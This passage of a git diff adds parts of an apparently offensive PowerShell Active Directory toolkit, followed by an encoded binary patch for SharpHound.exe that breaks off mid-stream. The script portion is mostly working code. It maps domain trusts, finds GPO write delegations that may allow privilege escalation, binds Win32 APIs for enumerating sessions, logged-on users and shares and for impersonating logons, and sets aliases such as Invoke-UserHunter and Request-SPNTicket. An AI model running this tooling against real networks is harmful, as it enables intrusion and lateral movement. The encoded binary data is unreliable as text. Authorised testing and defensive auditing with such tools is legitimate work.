'LDAP')] + 
[Switch] + $Tombstone, + + [Parameter(ParameterSetName = 'LDAP')] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + # keep track of domains seen so we don't hit infinite recursion + $SeenDomains = @{} + + # our domain status tracker + $Domains = New-Object System.Collections.Stack + + $DomainTrustArguments = @{} + if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API } + if ($PSBoundParameters['NET']) { $DomainTrustArguments['NET'] = $NET } + if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential } + + # get the current domain and push it onto the stack + if ($PSBoundParameters['Credential']) { + $CurrentDomain = (Get-Domain -Credential $Credential).Name + } + else { + $CurrentDomain = (Get-Domain).Name + } + $Domains.Push($CurrentDomain) + + while($Domains.Count -ne 0) { + + $Domain = $Domains.Pop() + + # if we haven't seen this domain before + if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) { + + Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'" + + # mark it as seen in our list + $Null = 
$SeenDomains.Add($Domain, '') + + try { + # get all the trusts for this domain + $DomainTrustArguments['Domain'] = $Domain + $Trusts = Get-DomainTrust @DomainTrustArguments + + if ($Trusts -isnot [System.Array]) { + $Trusts = @($Trusts) + } + + # get any forest trusts, if they exist + if ($PsCmdlet.ParameterSetName -eq 'NET') { + $ForestTrustArguments = @{} + if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential } + $Trusts += Get-ForestTrust @ForestTrustArguments + } + + if ($Trusts) { + if ($Trusts -isnot [System.Array]) { + $Trusts = @($Trusts) + } + + # enumerate each trust found + ForEach ($Trust in $Trusts) { + if ($Trust.SourceName -and $Trust.TargetName) { + # make sure we process the target + $Null = $Domains.Push($Trust.TargetName) + $Trust + } + } + } + } + catch { + Write-Verbose "[Get-DomainTrustMapping] Error: $_" + } + } + } +} + + +function Get-GPODelegation { +<# +.SYNOPSIS + +Finds users with write permissions on GPO objects which may allow privilege escalation within the domain. + +Author: Itamar Mizrahi (@MrAnde7son) +License: BSD 3-Clause +Required Dependencies: None + +.PARAMETER GPOName + +The GPO display name to query for, wildcards accepted. + +.PARAMETER PageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.EXAMPLE + +Get-GPODelegation + +Returns all GPO delegations in current forest. + +.EXAMPLE + +Get-GPODelegation -GPOName + +Returns all GPO delegations on a given GPO. 
+#> + + [CmdletBinding()] + Param ( + [String] + $GPOName = '*', + + [ValidateRange(1,10000)] + [Int] + $PageSize = 200 + ) + + $Exclusions = @('SYSTEM','Domain Admins','Enterprise Admins') + + $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() + $DomainList = @($Forest.Domains) + $Domains = $DomainList | foreach { $_.GetDirectoryEntry() } + foreach ($Domain in $Domains) { + $Filter = "(&(objectCategory=groupPolicyContainer)(displayname=$GPOName))" + $Searcher = New-Object System.DirectoryServices.DirectorySearcher + $Searcher.SearchRoot = $Domain + $Searcher.Filter = $Filter + $Searcher.PageSize = $PageSize + $Searcher.SearchScope = "Subtree" + $listGPO = $Searcher.FindAll() + foreach ($gpo in $listGPO){ + $ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match "Write" -and $_.AccessControlType -eq "Allow" -and $Exclusions -notcontains $_.IdentityReference.toString().split("\")[1] -and $_.IdentityReference -ne "CREATOR OWNER"} + if ($ACL -ne $null){ + $GpoACL = New-Object psobject + $GpoACL | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath + $GpoACL | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname + $GpoACL | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference + $GpoACL | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights + $GpoACL + } + } + } +} + + +######################################################## +# +# Expose the Win32API functions and datastructures below +# using PSReflect. +# Warning: Once these are executed, they are baked in +# and can't be changed while the script is running! 
+# +######################################################## + +$Mod = New-InMemoryModule -ModuleName Win32 + +# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')] + +# used to parse the 'samAccountType' property for users/computers/groups +$SamAccountTypeEnum = psenum $Mod PowerView.SamAccountTypeEnum UInt32 @{ + DOMAIN_OBJECT = '0x00000000' + GROUP_OBJECT = '0x10000000' + NON_SECURITY_GROUP_OBJECT = '0x10000001' + ALIAS_OBJECT = '0x20000000' + NON_SECURITY_ALIAS_OBJECT = '0x20000001' + USER_OBJECT = '0x30000000' + MACHINE_ACCOUNT = '0x30000001' + TRUST_ACCOUNT = '0x30000002' + APP_BASIC_GROUP = '0x40000000' + APP_QUERY_GROUP = '0x40000001' + ACCOUNT_TYPE_MAX = '0x7fffffff' +} + +# used to parse the 'grouptype' property for groups +$GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{ + CREATED_BY_SYSTEM = '0x00000001' + GLOBAL_SCOPE = '0x00000002' + DOMAIN_LOCAL_SCOPE = '0x00000004' + UNIVERSAL_SCOPE = '0x00000008' + APP_BASIC = '0x00000010' + APP_QUERY = '0x00000020' + SECURITY = '0x80000000' +} -Bitfield + +# used to parse the 'userAccountControl' property for users/groups +$UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{ + SCRIPT = 1 + ACCOUNTDISABLE = 2 + HOMEDIR_REQUIRED = 8 + LOCKOUT = 16 + PASSWD_NOTREQD = 32 + PASSWD_CANT_CHANGE = 64 + ENCRYPTED_TEXT_PWD_ALLOWED = 128 + TEMP_DUPLICATE_ACCOUNT = 256 + NORMAL_ACCOUNT = 512 + INTERDOMAIN_TRUST_ACCOUNT = 2048 + WORKSTATION_TRUST_ACCOUNT = 4096 + SERVER_TRUST_ACCOUNT = 8192 + DONT_EXPIRE_PASSWORD = 65536 + MNS_LOGON_ACCOUNT = 131072 + SMARTCARD_REQUIRED = 262144 + TRUSTED_FOR_DELEGATION = 524288 + NOT_DELEGATED = 1048576 + USE_DES_KEY_ONLY = 2097152 + DONT_REQ_PREAUTH = 4194304 + PASSWORD_EXPIRED = 8388608 + TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216 + PARTIAL_SECRETS_ACCOUNT = 67108864 +} -Bitfield + +# enum used by $WTS_SESSION_INFO_1 below +$WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ + Active = 0 + 
Connected = 1 + ConnectQuery = 2 + Shadow = 3 + Disconnected = 4 + Idle = 5 + Listen = 6 + Reset = 7 + Down = 8 + Init = 9 +} + +# the WTSEnumerateSessionsEx result structure +$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{ + ExecEnvId = field 0 UInt32 + State = field 1 $WTSConnectState + SessionId = field 2 UInt32 + pSessionName = field 3 String -MarshalAs @('LPWStr') + pHostName = field 4 String -MarshalAs @('LPWStr') + pUserName = field 5 String -MarshalAs @('LPWStr') + pDomainName = field 6 String -MarshalAs @('LPWStr') + pFarmName = field 7 String -MarshalAs @('LPWStr') +} + +# the particular WTSQuerySessionInformation result structure +$WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{ + AddressFamily = field 0 UInt32 + Address = field 1 Byte[] -MarshalAs @('ByValArray', 20) +} + +# the NetShareEnum result structure +$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{ + Name = field 0 String -MarshalAs @('LPWStr') + Type = field 1 UInt32 + Remark = field 2 String -MarshalAs @('LPWStr') +} + +# the NetWkstaUserEnum result structure +$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{ + UserName = field 0 String -MarshalAs @('LPWStr') + LogonDomain = field 1 String -MarshalAs @('LPWStr') + AuthDomains = field 2 String -MarshalAs @('LPWStr') + LogonServer = field 3 String -MarshalAs @('LPWStr') +} + +# the NetSessionEnum result structure +$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{ + CName = field 0 String -MarshalAs @('LPWStr') + UserName = field 1 String -MarshalAs @('LPWStr') + Time = field 2 UInt32 + IdleTime = field 3 UInt32 +} + +# enum used by $LOCALGROUP_MEMBERS_INFO_2 below +$SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{ + SidTypeUser = 1 + SidTypeGroup = 2 + SidTypeDomain = 3 + SidTypeAlias = 4 + SidTypeWellKnownGroup = 5 + SidTypeDeletedAccount = 6 + SidTypeInvalid = 7 + SidTypeUnknown = 8 + SidTypeComputer = 9 +} + +# the NetLocalGroupEnum result structure +$LOCALGROUP_INFO_1 = struct $Mod 
LOCALGROUP_INFO_1 @{ + lgrpi1_name = field 0 String -MarshalAs @('LPWStr') + lgrpi1_comment = field 1 String -MarshalAs @('LPWStr') +} + +# the NetLocalGroupGetMembers result structure +$LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{ + lgrmi2_sid = field 0 IntPtr + lgrmi2_sidusage = field 1 $SID_NAME_USE + lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr') +} + +# enums used in DS_DOMAIN_TRUSTS +$DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{ + IN_FOREST = 1 + DIRECT_OUTBOUND = 2 + TREE_ROOT = 4 + PRIMARY = 8 + NATIVE_MODE = 16 + DIRECT_INBOUND = 32 +} -Bitfield +$DsDomainTrustType = psenum $Mod DsDomain.TrustType UInt32 @{ + DOWNLEVEL = 1 + UPLEVEL = 2 + MIT = 3 + DCE = 4 +} +$DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{ + NON_TRANSITIVE = 1 + UPLEVEL_ONLY = 2 + FILTER_SIDS = 4 + FOREST_TRANSITIVE = 8 + CROSS_ORGANIZATION = 16 + WITHIN_FOREST = 32 + TREAT_AS_EXTERNAL = 64 +} + +# the DsEnumerateDomainTrusts result structure +$DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{ + NetbiosDomainName = field 0 String -MarshalAs @('LPWStr') + DnsDomainName = field 1 String -MarshalAs @('LPWStr') + Flags = field 2 $DsDomainFlag + ParentIndex = field 3 UInt32 + TrustType = field 4 $DsDomainTrustType + TrustAttributes = field 5 $DsDomainTrustAttributes + DomainSid = field 6 IntPtr + DomainGuid = field 7 Guid +} + +# used by WNetAddConnection2W +$NETRESOURCEW = struct $Mod NETRESOURCEW @{ + dwScope = field 0 UInt32 + dwType = field 1 UInt32 + dwDisplayType = field 2 UInt32 + dwUsage = field 3 UInt32 + lpLocalName = field 4 String -MarshalAs @('LPWStr') + lpRemoteName = field 5 String -MarshalAs @('LPWStr') + lpComment = field 6 String -MarshalAs @('LPWStr') + lpProvider = field 7 String -MarshalAs @('LPWStr') +} + +# all of the Win32 API functions we need +$FunctionDefinitions = @( + (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), 
[Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), + (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), + (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), + (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), + (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), + (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), + (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError), + (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError), + (func advapi32 RevertToSelf ([Bool]) @() -SetLastError), + (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), + (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), + (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), + (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), + (func wtsapi32 
WTSFreeMemory ([Int]) @([IntPtr])), + (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])), + (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])), + (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])), + (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError) +) + +$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' +$Netapi32 = $Types['netapi32'] +$Advapi32 = $Types['advapi32'] +$Wtsapi32 = $Types['wtsapi32'] +$Mpr = $Types['Mpr'] +$Kernel32 = $Types['kernel32'] + +Set-Alias Get-IPAddress Resolve-IPAddress +Set-Alias Convert-NameToSid ConvertTo-SID +Set-Alias Convert-SidToName ConvertFrom-SID +Set-Alias Request-SPNTicket Get-DomainSPNTicket +Set-Alias Get-DNSZone Get-DomainDNSZone +Set-Alias Get-DNSRecord Get-DomainDNSRecord +Set-Alias Get-NetDomain Get-Domain +Set-Alias Get-NetDomainController Get-DomainController +Set-Alias Get-NetForest Get-Forest +Set-Alias Get-NetForestDomain Get-ForestDomain +Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog +Set-Alias Get-NetUser Get-DomainUser +Set-Alias Get-UserEvent Get-DomainUserEvent +Set-Alias Get-NetComputer Get-DomainComputer +Set-Alias Get-ADObject Get-DomainObject +Set-Alias Set-ADObject Set-DomainObject +Set-Alias Get-ObjectAcl Get-DomainObjectAcl +Set-Alias Add-ObjectAcl Add-DomainObjectAcl +Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl +Set-Alias Get-GUIDMap Get-DomainGUIDMap +Set-Alias Get-NetOU Get-DomainOU +Set-Alias Get-NetSite Get-DomainSite +Set-Alias Get-NetSubnet Get-DomainSubnet +Set-Alias Get-NetGroup Get-DomainGroup +Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup +Set-Alias Get-NetGroupMember Get-DomainGroupMember +Set-Alias Get-NetFileServer Get-DomainFileServer +Set-Alias Get-DFSshare Get-DomainDFSShare +Set-Alias Get-NetGPO Get-DomainGPO +Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup +Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping +Set-Alias Find-GPOComputerAdmin 
Get-DomainGPOComputerLocalGroupMapping +Set-Alias Get-LoggedOnLocal Get-RegLoggedOn +Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess +Set-Alias Get-SiteName Get-NetComputerSiteName +Set-Alias Get-Proxy Get-WMIRegProxy +Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn +Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection +Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive +Set-Alias Get-NetProcess Get-WMIProcess +Set-Alias Invoke-ThreadedFunction New-ThreadedFunction +Set-Alias Invoke-UserHunter Find-DomainUserLocation +Set-Alias Invoke-ProcessHunter Find-DomainProcess +Set-Alias Invoke-EventHunter Find-DomainUserEvent +Set-Alias Invoke-ShareFinder Find-DomainShare +Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile +Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember +Set-Alias Get-NetDomainTrust Get-DomainTrust +Set-Alias Get-NetForestTrust Get-ForestTrust +Set-Alias Find-ForeignUser Get-DomainForeignUser +Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember +Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping +Set-Alias Get-DomainPolicy Get-DomainPolicyData 
diff --git a/win/SharpHound.exe b/win/SharpHound.exe new file mode 100644 index 0000000000000000000000000000000000000000..78e97429589d5b8c7df90f23df11d8eae5fbbd74 GIT binary patch literal 832512 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 
